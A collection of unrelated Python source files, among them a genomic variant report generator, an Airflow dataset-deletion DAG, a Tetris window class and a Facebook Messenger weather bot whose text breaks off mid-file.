+{"seq_id":"5337621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 1 18:18:50 2021\n\n@author: tardis\n\"\"\"\nimport sys\nimport pandas as pd\nimport myvariant\n\n# Used to create a report in pdf format\nfrom reportlab.platypus import SimpleDocTemplate\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.platypus import Paragraph\nfrom reportlab.lib.enums import TA_JUSTIFY\n\n\n# Get data from given database: 'civic', 'clinvar', 'cosmic', 'snpeff' or anywhere it can find\ndef _pull_data(dir_, database):\n # Create an empty list to store annotations\n variant_annotations = []\n evidence_items = []\n info = []\n \n # Get information about variant\n if 'civic' in dir_ and database == 'civic':\n gene_ = dir_[database]['entrez_name']\n protein_change_ = dir_[database]['name']\n \n # Get variant annotation for identified variant\n if 'civic' in dir_ and 'description' in dir_[database]:\n 
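# The 'description' field holds CIViC's curated plain-text summary of the variant.\n        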
variant_annotations.append(dir_[database]['description'])\n \n # Get evidence statements if known\n if 'civic' in dir_ and 'evidence_items' in dir_[database]:\n if isinstance(dir_[database]['evidence_items'], list):\n for d in dir_[database]['evidence_items']:\n evidence_items.append(d['description'])\n \n # If short summaries for the mutation not found in 'civic', store 'ann' values instead\n for key, value in dir_.items():\n if isinstance(value, dict) and 'ann' in value.keys():\n info.append((key, value['ann']))\n ann = value['ann']\n gene_ = value['ann']['genename' if isinstance(value['ann'], dict) else 0]\n if isinstance(gene_, dict): gene_ = gene_['genename']\n protein_change_ = value['ann']['effect' if isinstance(value['ann'], dict) else 0]\n if isinstance(protein_change_, dict): protein_change_ = protein_change_['transcript_biotype']\n \n if not len(variant_annotations):\n if isinstance(ann, dict):\n description = 'In database ' + info[0][0] + ' mutation with the gene ID ' + ann['genename'] + ' and Human Genome Variant Society nomenclature ' + ann['hgvs_c'] + ' is found to be ' + ann['effect'] + ' and has a putative impact of ' + ann['putative_impact'] + '.'\n elif isinstance(ann, list):\n description = 'In database ' + info[0][0] + ' mutation with the gene ID ' + ann[0]['genename'] + ' and Human Genome Variant Society nomenclature ' + ann[0]['hgvs_c'] + ' is found to be ' + ann[0]['effect'] + ' and has a putative impact of ' + ann[0]['putative_impact'] + '.'\n \n variant_annotations.append(description)\n\n return variant_annotations, gene_, protein_change_, info, evidence_items\n\n\ndef _add_variant_info(variant_annotations, annotated_variants, gene_, protein_change_, info, v, content, style_, evidence_items, assembly):\n # Add info about variant to the report: Gene Name, Protein Change and Coordinates\n content.append(Paragraph('Clinical Variant ' + str(annotated_variants), style_['Heading2']))\n content.append(Paragraph('Gene Name: ' + '\\t'+ '\\t'+ '\\t' + str(gene_) + '\\n', style_['BodyText']))\n content.append(Paragraph('Protein Change: ' if assembly == 'hg19' else 'Transcript Biotype: ' + '\\t'+ '\\t' + str(protein_change_) + '\\n', style_['BodyText']))\n content.append(Paragraph('Coordinates: ' + '\\t'+ '\\t'+ '\\t' + str(v) + '\\n', style_['BodyText']))\n \n # Make a title for variant annotation section\n content.append(Paragraph('Variant Annotation ', style_['Heading3']))\n \n # Add annotations to the report if found\n if len(variant_annotations):\n for annot in variant_annotations:\n p = Paragraph(str(annot), style_['Justified'])\n content.append(p)\n elif len(info):\n for i in range(len(info)):\n content.append(Paragraph('In database ' + info[i][0] + ' mutation is found to be ' + info[i][1]['effect'] if isinstance(info[i][1], dict) else info[i][1][0]['effect'] + '\\n', style_['Justified']))\n else:\n p = Paragraph('Variant annotation not found...' + '\\n', style_['Justified'])\n content.append(p)\n \n # Put a 'evidence statements' title\n content.append(Paragraph('Evidence Statements ', style_['Heading3']))\n \n # Add evidence statements to the report if found\n if len(evidence_items):\n for i, evidence in enumerate(evidence_items):\n content.append(Paragraph('Evidence statement ' + str(i + 1), style_['Heading4']))\n content.append(Paragraph(str(evidence), style_['Justified']))\n else:\n p = Paragraph('Evidence statements not found...' 
+ '\\n', style_['Justified'])\n content.append(p)\n\n\ndef _add_additional_info(total_variants, annotated_variants, content, style_):\n # Add additional info: processed variants and annotated variants\n content.append(Paragraph('Additional information', style_['Heading3']))\n \n # Give the number of processed variants\n content.append(Paragraph('Total Number of Variants Processed: ' + str(total_variants) + '\\n', style_['BodyText']))\n\n # Give the number of annotated variants\n content.append(Paragraph('The Number of Clinical Annotations: ' + str(annotated_variants) + '\\n', style_['BodyText']))\n\n\ndef getvariant(chromosome, start, ref, var):\n # Create myvariant info instance\n mv = myvariant.MyVariantInfo()\n\n # Get variant information for: chromosome, int(start), ref, var\n v = myvariant.format_hgvs(chromosome, int(start), ref, var)\n dir_ = mv.getvariant(v)\n \n # Return variant information found in all databases as a directory\n return dir_\n\n\ndef annotate_mutations(file, assembly = 'hg19'):\n # Open variant file with pandas\n identified_variants = pd.read_csv(file, sep='\\t')\n \n # Give a name to the output file: 'test_filename' + '_AIM_report.pdf'\n doc_name = file.split('.')[0] + '_AIV_Report.pdf'\n \n # Create a sample document and sample style sheet\n report = SimpleDocTemplate(doc_name)\n style_ = getSampleStyleSheet()\n \n # Add a paragraph style to justify text\n style_.add(ParagraphStyle('Justified', alignment=TA_JUSTIFY))\n \n # Create a list to store all the content which will be written into the report\n content = []\n\n # Put main title of the annotation report\n content.append(Paragraph(\"Annotation of Identified Variants\", style_['Heading1']))\n \n # Add given input file name\n content.append(Paragraph('File Name: ' + '\\t' + '\\t' + '\\t' + str(file) + '\\n', style_['BodyText']))\n\n # Get a myvariant info instance\n mv = myvariant.MyVariantInfo()\n\n # Initiliaze a counter for variants\n total_variants = 0\n annotated_variants = 0\n\n # Loop through identified variants and get annotations\n for i, row in identified_variants.iterrows():\n # Store the total number of variants given in the input file\n total_variants +=1\n \n # Get chromosome, start, reference and variant columns\n chrom_ = row['Chromosome']\n start_ = row['Start']\n ref_ = row['Ref']\n var_ = row['Var']\n \n # Get variant information\n v = myvariant.format_hgvs(chrom_, int(start_), ref_, var_)\n dir_ = mv.getvariant(v, assembly=assembly)\n\n # Get data from 'civic'\n if dir_:\n # Create an empty list to store annotations\n variant_annotations, gene_, protein_change_, info, evidence_items = _pull_data(dir_, 'civic')\n \n # Increase the number of clinically annotated variants by 1 (one).\n annotated_variants +=1\n \n # Add content to the report: general info, annotations & evidence statements\n _add_variant_info(variant_annotations, annotated_variants, gene_, protein_change_, info, v, content, style_, evidence_items, assembly)\n \n \n # Add processing information: total processed variants and number of annotated variants\n _add_additional_info(total_variants, annotated_variants, content, style_)\n\n # Save report in the same directory\n report.build(content)\n","sub_path":"build/lib/aiv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"160032306","text":"from model.contact import Contact\nimport random\nimport string\nimport os.path\nimport jsonpickle\nimport 
getopt\nimport sys\n\ntry:\n    opts, args = getopt.getopt(sys.argv[1:], \"n:f:\", [\"number of contacts\", \"file\"])\nexcept getopt.GetoptError as err:\n    print(err)  # getopt has no usage() helper; report the parse error instead\n    sys.exit(2)\n\nn = 5\nf = \"data/contacts.json\"\n\nfor o, a in opts:\n    if o == \"-n\":\n        n = int(a)\n    elif o == \"-f\":\n        f = a\n\ndef random_string(prefix, maxleng):\n    symbols = string.ascii_letters + string.digits\n    return prefix + \"\".join([random.choice(symbols) for i in range(random.randrange(maxleng))])\n\ntestdata = [Contact(firstname=\"\", lastname=\"\", address=\"\", homephone=\"\", mobilephone=\"\", workphone=\"\", phone=\"\",\n                    mail1=\"\", mail2=\"\", mail3=\"\")] + \\\n[\n    Contact(firstname=random_string(\"firstname\", 12), lastname=random_string(\"lastname\", 12),\naddress=random_string(\"address\", 12), homephone=random_string(\"homephone\", 7), mobilephone=random_string(\"mobilephone\", 12),\nworkphone=random_string(\"workphone\", 12), phone=random_string(\"phone\", 12), mail1=random_string(\"mail1\", 12),\nmail2=random_string(\"mail2\", 12), mail3=random_string(\"mail3\", 12),)\n    for i in range(n)\n]\n\nfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", f)\n\nwith open(file, \"w\") as out:\n    jsonpickle.set_encoder_options(\"json\", indent=2)\n    out.write(jsonpickle.encode(testdata))","sub_path":"generator/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"253924476","text":"# -*- encoding: utf-8 -*-\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import UserError\n\n\nclass ProductTemplate(models.Model):\n    _inherit = \"product.template\"\n\n    def write(self, vals):\n        if not vals.get('active', True):\n            self.env['mrp.bom'].sudo().search([('product_tmpl_id', 'in', self.ids)]).write({'active': False})\n        return super(ProductTemplate, self).write(vals)\n\n\nclass ProductProduct(models.Model):\n    _inherit = \"product.product\"\n\n    def name_get(self):\n        result = super(ProductProduct, self).name_get()\n\n        archived_product_ids = self.filtered(lambda rec: not rec.active).ids\n        for i, rec in enumerate(result):\n            if rec[0] in archived_product_ids and 'ARCV:' not in rec[1]:\n                result[i] = (rec[0], \"ARCV: %s\" % rec[1])\n\n        return result\n\n    def write(self, vals):\n        if not vals.get('active', True):\n            product_available = self._product_available()\n            for product in self:\n                if product_available.get(product.id, {}).get('qty_available', 0):\n                    raise UserError(\"Action cannot be performed as Product %s has stock available.\" % (product.display_name))\n\n            self.mapped('orderpoint_ids').write({'active': False})\n            self.env['mrp.bom'].sudo().search([('product_id', 'in', self.ids)]).write({'active': False})\n\n        return super(ProductProduct, self).write(vals)\n\n    def unlink(self):\n        self.env['mrp.bom'].sudo().search([('product_id', 'in', self.ids)]).write({'active': False})\n        return super(ProductProduct, self).unlink()\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"product_archive/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"631421130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# A commandline-based four-function calculator.\nfrom re import split\n\nprint(\"A simple four function calculator\\n\")\nprint(\"Type \\\"quit\\\" or \\\"exit\\\" to quit.\")\nprint(\"Operators are: +, -, 
*, and /\\n\")\n\ndef add(x: int, y: int):\n    \"\"\"\n    :type x: int\n    :type y: int\n    \"\"\"\n    return x + y\n\n\ndef sub(x: int, y: int):\n    \"\"\"\n    :type x: int\n    :type y: int\n    \"\"\"\n    return x - y\n\n\ndef mul(x: int, y: int):\n    \"\"\"\n    :type x: int\n    :type y: int\n    \"\"\"\n    return x * y\n\n\ndef div(x: int, y: int):\n    \"\"\"\n    :type x: int\n    :type y: int\n    \"\"\"\n    if y == 0:\n        print(\"Division by zero. Result undefined!\")\n        return 0\n    return x / y\n\n\nwhile True:\n    exp = input(\"> \")\n\n    if exp == \"quit\":\n        break\n    elif exp == \"exit\":\n        break\n\n    print(\"expression: \" + exp)\n\n    # '+' and '*' are regex metacharacters, so escape them in raw strings.\n    if \"+\" in exp:\n        # print(\"Addition!\")\n        a, b = split(r'\\+', exp)\n        print(add(int(a), int(b)))\n    elif \"-\" in exp:\n        # print(\"Subtraction!\")\n        a, b = split('-', exp)\n        print(sub(int(a), int(b)))\n    elif \"*\" in exp:\n        # print(\"Multiplication!\")\n        a, b = split(r'\\*', exp)\n        print(mul(int(a), int(b)))\n    elif \"/\" in exp:\n        # print(\"Division!\")\n        a, b = split('/', exp)\n        print(int(div(int(a), int(b))))\n","sub_path":"calc/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"228495168","text":"\"\"\"\nAdd Binary\n\nGiven two binary strings, return their sum as a binary string.\n\nThe inputs are non-empty and contain only the digits 1 and 0.\n\nFor example:\n\"11\" + \"1\" = \"100\"\n\"\"\"\n\n\nclass Solution:\n    def addBinary(self, a, b):\n\n        p1 = len(a) - 1\n        p2 = len(b) - 1\n        add = 0  # carry bit\n        result = []\n        while p1 >= 0 or p2 >= 0:\n            val = 0\n            if p1 >= 0:\n                val += int(a[p1])\n                p1 -= 1\n            if p2 >= 0:\n                val += int(b[p2])\n                p2 -= 1\n            val += add\n            add = val // 2\n            result.append(str(val % 2))\n\n        if add > 0:\n            result.append(str(add))\n        return \"\".join(result[::-1])\n\n\nif __name__ == '__main__':\n    s = Solution()\n    assert (s.addBinary(\"11\", \"1\") == \"100\")\n","sub_path":"string/67.二进制求和.py","file_name":"67.二进制求和.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"467838196","text":"\"\"\"\n# Delete selected version of datasets (Self Serve)\n\nThis DAG should be triggered manually and will:\n\n- delete selected datasets matching condition: product_name='something', version='2.5.0', sensor='landsat-8'\n\n## Note\nA full list of utility DAGs is here: https://github.com/GeoscienceAustralia/dea-airflow/tree/develop/dags/deletion, see Readme\n\n## Customisation\n\nThere are three configuration arguments:\n\n- `product_name`\n- `version`\n- `sensor`\n\nThe steps executed by this DAG are:\n\n1. pre-check that datasets matching the condition exist for the given product; if none are found, this DAG will fail\n2. execute the deletion\n3. 
confirm the deletion succeeded; if datasets are still found, this DAG will fail\n\n\n### Sample Configuration\n    {\n        \"product_name\": \"ga_ls_fc_3\",\n        \"version\": \"2.5.0\",\n        \"sensor\": \"landsat-8\"\n    }\n\n## For local integration testing\n\n```\n    docker-compose -f docker-compose.workflow.yaml run airflow-worker \\\n    airflow dags trigger --conf '{\"product_name\": \"ga_ls7e_ard_provisional_3\", \"version\": \"3.2.0\", \"sensor\": \"landsat-7\"}' deletion_utility_datasets_version_sensor\n\n```\n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\n\nfrom airflow.operators.python import PythonOperator\n\nfrom infra.connections import DB_ODC_READER_CONN, DB_ODC_WRITER_CONN\nfrom airflow.exceptions import AirflowException\nfrom deletion.deletion_sql_queries import (\n    DATASET_COUNT_BY_ANY_CLAUSE,\n)\n\n\nDAG_NAME = \"deletion_utility_datasets_version_sensor\"\n\nDEFAULT_ARGS = {\n    \"owner\": \"Emma Ai\",\n    \"depends_on_past\": False,\n    \"start_date\": datetime(2022, 3, 10),\n    \"email\": [\"emma.ai@ga.gov.au\"],\n    \"email_on_failure\": False,\n    \"email_on_retry\": False,\n    \"retries\": 1,\n    \"retry_delay\": timedelta(minutes=5),\n}\n\nversion = \"{{ dag_run.conf.version }}\"\nsensor = \"{{ dag_run.conf.sensor }}\"\n\nSQL_WHERE_CLAUSE = \"\"\"\n    (ds.metadata -> 'properties' ->> 'odc:dataset_version' = '%s')\n    and (ds.metadata -> 'properties' ->> 'eo:platform' = '%s')\n    \"\"\" % (\n    version,\n    sensor,\n)\n\n\ndef count_datasets(product_name=\"\", where_clause=\"\", after_delete=False, **kwargs):\n    \"\"\"\n    Check whether matching datasets exist and count them.\n    after_delete: True/False indicates whether this runs after/before the deletion\n    \"\"\"\n    query_string = DATASET_COUNT_BY_ANY_CLAUSE.format(\n        product_name=product_name, clause=where_clause\n    )\n\n    print(query_string)\n    pg_hook = PostgresHook(postgres_conn_id=DB_ODC_READER_CONN)\n    connection = pg_hook.get_conn()\n    cursor = connection.cursor()\n    cursor.execute(query_string)\n    result = cursor.fetchone()\n    if not result or result[0] == 0:\n        if not after_delete:\n            raise AirflowException(\n                \"No dataset in %s satisfies %s\" % (product_name, where_clause)\n            )  # mark it failed\n        else:\n            print(\"No dataset found, deletion has successfully completed\")\n            return True\n\n    else:\n        if not after_delete:\n            print(\n                f\"{result[0]} datasets of product {product_name} with {where_clause} can be deleted\"\n            )\n            return True\n        else:\n            raise AirflowException(\n                f\"{result[0]} datasets of product {product_name} with {where_clause} remaining, deletion failed\"\n            )\n\n\ndef delete_selected_datasets(product_name=\"\", where_clause=\"\", **kwargs):\n    \"\"\"\n    Delete the datasets of product_name by where_clause\n    \"\"\"\n    pg_hook = PostgresHook(postgres_conn_id=DB_ODC_WRITER_CONN)\n    sql = kwargs[\"templates_dict\"][\"sql\"]\n    query_string = sql.format(product_name=product_name, clause=where_clause)\n    pg_hook.run(query_string)\n\n\n# THE DAG\ndag = DAG(\n    dag_id=DAG_NAME,\n    doc_md=__doc__,\n    default_args=DEFAULT_ARGS,\n    schedule_interval=None,\n    catchup=False,\n    tags=[\n        \"k8s\",\n        \"self-service\",\n        \"datasets-deletion\",\n        \"deletion\",\n    ],\n)\n\nwith dag:\n\n    branchop = PythonOperator(\n        task_id=\"count_datasets_before_delete\",\n        python_callable=count_datasets,\n        op_kwargs={\n            \"product_name\": \"{{ dag_run.conf.product_name }}\",\n            \"where_clause\": SQL_WHERE_CLAUSE,\n            \"after_delete\": False,\n        },\n    )\n\n    delete_selected_datasets = PythonOperator(\n        
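# templates_dict + templates_exts make Airflow load the .sql file and render\n        # it through Jinja before it is passed to the python_callable.\n        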
task_id=\"delete_selected_datasets\",\n python_callable=delete_selected_datasets,\n op_kwargs={\n \"product_name\": \"{{ dag_run.conf.product_name }}\",\n \"where_clause\": SQL_WHERE_CLAUSE,\n },\n templates_dict={\"sql\": \"deletion_sql/delete_datasets_wild_card.sql\"},\n templates_exts=(\".sql\",),\n )\n\n execution_status_reporter = PythonOperator(\n task_id=\"count_datasets_after_delete\",\n python_callable=count_datasets,\n op_kwargs={\n \"product_name\": \"{{ dag_run.conf.product_name }}\",\n \"where_clause\": SQL_WHERE_CLAUSE,\n \"after_delete\": True,\n },\n )\n\n branchop >> delete_selected_datasets >> execution_status_reporter\n","sub_path":"dags/deletion/utility_delete_selected_version_datasets.py","file_name":"utility_delete_selected_version_datasets.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"233092942","text":"from .Technion_Request import *\nfrom .Huji_Request import *\nfrom .Tlv_Request import *\nfrom .Beer_Sheva_Request import *\nfrom .Profs import *\n\n\na = Prof('אזרחות',5,90)\nb = Prof('אנגלית', 5, 80)\nc = Prof('הבעה עברית', 5, 80)\nd = Prof('הסטוריה', 5, 80)\ne = Prof('מתמטיקה', 5, 80)\nf = Prof('ספרות', 5, 80)\ng = Prof('תנ\"ך', 5, 94)\nlistp = [a,b,c,d,e,f,g]\n\nclass Generate:\n\n def __init__(self, profs_list, psycho):\n self.profs = profs_list\n self.psycho = psycho\n\ndef main(profs_list,psycho):\n technion_results=Technion_Request(profs_list, psycho)\n huji_results=Huji_Request(profs_list, psycho)\n tlv_results=Tlv_Request(profs_list,psycho)\n bgu_results=Beer_Sheva_Request(profs_list,psycho)\n all_results=[technion_results,huji_results,tlv_results,bgu_results]\n\n return(all_results)\n\ndef parse_modle_1_request(user_input:dict):\n proof_list = []\n for key in user_input:\n proof_list.append(Prof(key, user_input[key][0], user_input[key][1]))\n return proof_list\n\n\n\n","sub_path":"Tziunim_server/Run_Requests.py","file_name":"Run_Requests.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"498360184","text":"import pygame\n\nfrom tetris.graphics.board import Board\nfrom tetris.graphics.score import Score\n\n\nclass Window:\n WIDTH = 300\n HEIGHT = 700\n\n def __init__(self):\n pygame.init()\n self.window = pygame.display.set_mode((Window.WIDTH, Window.HEIGHT))\n self.board = Board(self.window)\n self.score = Score(self.window)\n\n def draw(self, board, score):\n self._clear()\n self.board.draw(board)\n self.score.draw(score)\n pygame.display.flip()\n \n def _clear(self):\n pygame.draw.rect(self.window, pygame.Color(\"black\"), pygame.Rect(0, 0, Window.WIDTH, Window.HEIGHT))\n","sub_path":"src/main/tetris/graphics/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"39388974","text":"from cgi import log\r\nimport threading\r\nimport requests\r\nimport random\r\nfrom fbchat import Client, log\r\nfrom fbchat.models import *\r\n\r\nclient = Client(\"email\", \"pass\")\r\nif not client.isLoggedIn():\r\n client = Client(\"email\", \"pass\")\r\n\r\nalreadyDone = False\r\n\r\n\r\n\r\ndef reset():\r\n global alreadyDone\r\n alreadyDone = False\r\n\r\n\r\ndef set_interval(func, sec):\r\n def func_wrapper():\r\n set_interval(func, sec)\r\n func()\r\n\r\n t = threading.Timer(sec, func_wrapper)\r\n t.start()\r\n return t\r\n\r\n\r\ndef 
isTrue():\r\n\r\n    global alreadyDone\r\n    if check() == \"1\" and alreadyDone is False:\r\n        client.send(Message(text='UPDATE: Wind speed is between 30-60kph. \\n '\r\n                                 'Intermittent rains may be expected in at least 36 hours. '\r\n                                 '(When the tropical cyclone develops very close to an area, '\r\n                                 'a shorter lead time of the occurrence of the winds will be '\r\n                                 'specified in the warning bulletin.) There is a possibility that '\r\n                                 'the Storm warning signal will be raised if the storm moves closer to '\r\n                                 'land. '\r\n                                 '*WAIT FOR SUSPENSION OF CLASSES, THIS IS NOT AN OFFICIAL WARNING SIGNAL.* \\n'\r\n                                 '-Powered by DarkSky Weather API.'),\r\n                    thread_id=\"2695213210490883\",\r\n                    thread_type=ThreadType.GROUP)\r\n\r\n        alreadyDone = True\r\n    elif check() == \"2\" and alreadyDone is False:\r\n        client.send(Message(text='UPDATE: Wind speed is now between 61 - 120kph. \\n '\r\n                                 'Light to moderate damage. '\r\n                                 'Winds of greater than 60 kph and up to 100 kph may be expected in at least 24 hours. '\r\n                                 'Special attention should be given to the latest position, direction and movement '\r\n                                 'speed, '\r\n                                 'and intensity of the storm as it moves toward an area. '\r\n                                 'The public, especially people traveling by sea and air, are cautioned. '\r\n                                 'Outdoor activities of children should be postponed. '\r\n                                 'Secure properties before the signal is upgraded. '\r\n                                 'Disaster preparedness agencies/organizations are in action to alert'\r\n                                 ' their communities. '\r\n                                 '*WAIT FOR SUSPENSION OF CLASSES, THIS IS NOT AN OFFICIAL WARNING SIGNAL.* \\n'\r\n                                 '-Powered by DarkSky Weather API.'),\r\n                    thread_id=\"2695213210490883\",\r\n                    thread_type=ThreadType.GROUP)\r\n\r\n        alreadyDone = True\r\n    elif check() == \"3\" and alreadyDone is False:\r\n        client.send(Message(text='UPDATE: Winds of greater than 100 kph up to 185 kph'\r\n                                 ' may be expected in at least 18 hours. \\n '\r\n                                 'Travel is very risky especially by air and sea. '\r\n                                 'People are advised to seek shelter in strong '\r\n                                 'buildings, '\r\n                                 'evacuate low-lying areas, and stay away from the coasts and riverbanks. '\r\n                                 'Watch out for the passage of the eye of the typhoon indicated by a sudden occurrence'\r\n                                 ' of fair weather immediately after very bad weather, '\r\n                                 'with very strong winds coming generally from the north. '\r\n                                 'When the eye of the typhoon hits the community, '\r\n                                 'do not venture away from the safe shelter because after one'\r\n                                 ' to two hours, the worst weather will resume,'\r\n                                 ' with the very strong winds coming from the south. '\r\n                                 'Classes at all levels should be suspended and '\r\n                                 'children should stay in the safety of strong buildings. '\r\n                                 'Disaster preparedness and response agencies/organizations are in action with '\r\n                                 'appropriate response to emergency. '\r\n                                 '*WAIT FOR SUSPENSION OF CLASSES, THIS IS NOT AN OFFICIAL WARNING SIGNAL.* \\n'\r\n                                 '-Powered by DarkSky Weather API.'),\r\n                    thread_id=\"2695213210490883\",\r\n                    thread_type=ThreadType.GROUP)\r\n\r\n        alreadyDone = True\r\n    elif check() == \"4\" and alreadyDone is False:  # check() returns strings, so compare against \"4\"\r\n        client.send(\r\n            Message(text='UPDATE: Very strong winds of more than 185 kph may be expected in at least 12 hours. \\n '\r\n                         'The situation is potentially very destructive to the community. '\r\n                         'The area is very likely to be hit directly by the eye of the typhoon. '\r\n                         'As the eye of the typhoon approaches, the weather will worsen continuously, with winds'\r\n                         ' increasing to their strongest, coming generally from the north. '\r\n                         'A sudden improvement of the weather with light winds will be experienced, which means the area is under the eye of the typhoon. '\r\n                         'Depending on the eye’s diameter and movement speed, this improved weather may last for an hour or two. '\r\n                         'As the eye moves out of the area, weather conditions will worsen, with strong winds generally coming from the south. '\r\n                         '*DON’T GO TO SCHOOL TODAY.* \\n'\r\n                         '-Powered by DarkSky Weather API.'),\r\n            thread_id=\"2695213210490883\",\r\n            thread_type=ThreadType.GROUP)\r\n\r\n        alreadyDone = True\r\n    elif check() == \"5\" and alreadyDone is False:\r\n        client.send(Message(text='UPDATE: Wind speed can reach over 220kph. \\n '\r\n                                 'Stay safe, I don’t know what else to say, but please stay safe and don’t go outside. '\r\n                                 '*DON’T GO TO SCHOOL TODAY.* \\n'\r\n                                 '-Powered by DarkSky Weather API.'),\r\n                    thread_id=\"2695213210490883\",\r\n                    thread_type=ThreadType.GROUP)\r\n\r\n        alreadyDone = True\r\n    elif check() == \"no\" and alreadyDone is True:\r\n\r\n        alreadyDone = False\r\n\r\n\r\ndef check():\r\n    i = requests.get(\"https://api.darksky.net/forecast/b2f13b2632333395c57e9dbb5f082cda/14.8528, 120.8154\")\r\n    data = i.json()\r\n\r\n    for key, value in dict.items(data):\r\n        if key != \"currently\":\r\n            pass\r\n        else:\r\n            a = value\r\n            val = int(a['windSpeed'])\r\n            if 30 <= val <= 60:\r\n                return \"1\"\r\n            elif 61 <= val <= 120:\r\n                return \"2\"\r\n            elif 121 <= val <= 170:\r\n                return \"3\"\r\n            elif 171 <= val <= 220:\r\n                return \"4\"\r\n            elif val > 220:\r\n                return \"5\"  # winds above 220 kph correspond to signal no. 5\r\n            else:\r\n                return \"no\"\r\n\r\n    isTrue()\r\n    reset()\r\n\r\n\r\nclass punkjj(Client):\r\n    def onMessage(self, author_id=None, message_object=None, thread_id=None, thread_type=ThreadType.USER, **kwargs):\r\n        toggle = client.fetchThreadMessages(thread_id=client.uid, limit=1)  # client.uid means it's our own account\r\n        for message in toggle:\r\n            pText = message.text.lower()\r\n            if \"online\" in pText:\r\n                self.markAsRead(author_id)\r\n                log.info(\"Message {} from {} in {}\".format(message_object, thread_id, thread_type))\r\n                msgText = message_object.text.lower()\r\n\r\n                if msgText == \"say hello, delpi bot!\" or msgText == \"say hi to them, delpi bot! \":\r\n                    client.send(Message(text=\"Hello! I am delpi bot, created and managed by \"\r\n                                             \"@Jam Emmanuel Arevalo Villarosa, written in \"\r\n                                             \"Python, using the \"\r\n                                             \"python FBChat API! I am currently a work in progress; \"\r\n                                             \"I would appreciate it if you all could give \"\r\n                                             \"suggestions as to what I can do, thank you! 
:)\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif msgText == \"tell me the weather today\" or msgText == \"whats the weather like today?\" or msgText == \"tell me the weather\" or msgText == \"\":\r\n i = requests.get(\"https://api.darksky.net/forecast/b2f13b2632333395c57e9dbb5f082cda/14.8528, 120.8154\")\r\n data = i.json()\r\n for key, value in dict.items(data):\r\n if key != \"currently\":\r\n pass\r\n else:\r\n a = value\r\n val = str(a['windSpeed'])\r\n t = round(int((a[\"temperature\"]) - 32) / 1.8)\r\n temp = str(round(int((a[\"temperature\"]) - 32) / 1.8))\r\n precipProb = str(a['precipProbability'])\r\n if 30 <= t <= 32:\r\n client.sendRemoteImage(\r\n \"https://scontent.fmnl8-1.fna.fbcdn.net/v/t1.15752-0/p280x\"\r\n \"280/88225254_655687121857925_6008140458004316160_n.png?_nc\"\r\n \"_cat=107&_nc_sid=b96e70&_nc_ohc=_6zpM_NdEu0AX9pxo1N&_nc_ht=\"\r\n \"scontent.fmnl8-1.fna&oh=24fd7c985f65333a985eed448c22aab9&oe=5EFCD9D3\",\r\n message=Message(text=\"What's the weather like today?\\n\"\r\n + \"*OVERCAST*\\n\" +\r\n \"Wind Speed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"It's getting hot!\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type,\r\n )\r\n\r\n elif 31 <= t <= 35:\r\n client.send(Message(text=\"What's the weather like today?\\n \"\r\n + \"*OVERCAST*\\n\" +\r\n \"Windspeed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"It's getting REALLY hot! Make sure to drink water!\"\r\n ),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif t <= 30:\r\n client.send(Message(text=\"What's the weather like today?\\n \"\r\n + \"*OVERCAST*\\n\" +\r\n \"Windspeed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"Normal temperature!\"\r\n ),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 20 <= t <= 25:\r\n client.send(Message(text=\"What's the weather like today?\\n \"\r\n + \"*OVERCAST*\\n\" +\r\n \"Windspeed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"It's so cold today!\"\r\n ),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif msgText == \"am i a dumbbell\" or msgText == \"dumbbell ba ako\":\r\n rand = random.randrange(1, 100)\r\n if 1 < rand < 15:\r\n client.send(Message(\r\n text=\"Pare isa ka sa mga pinaka-malaking dumbbell sa lahat, sorry to tell you the truth.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 15 < rand < 25:\r\n client.send(Message(\r\n text=\"Pabigat ka, pero hindi ka sobrang pabigat.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 25 < rand < 50:\r\n client.send(Message(\r\n text=\"Nagiging dumbbell ka kapag malungkot or 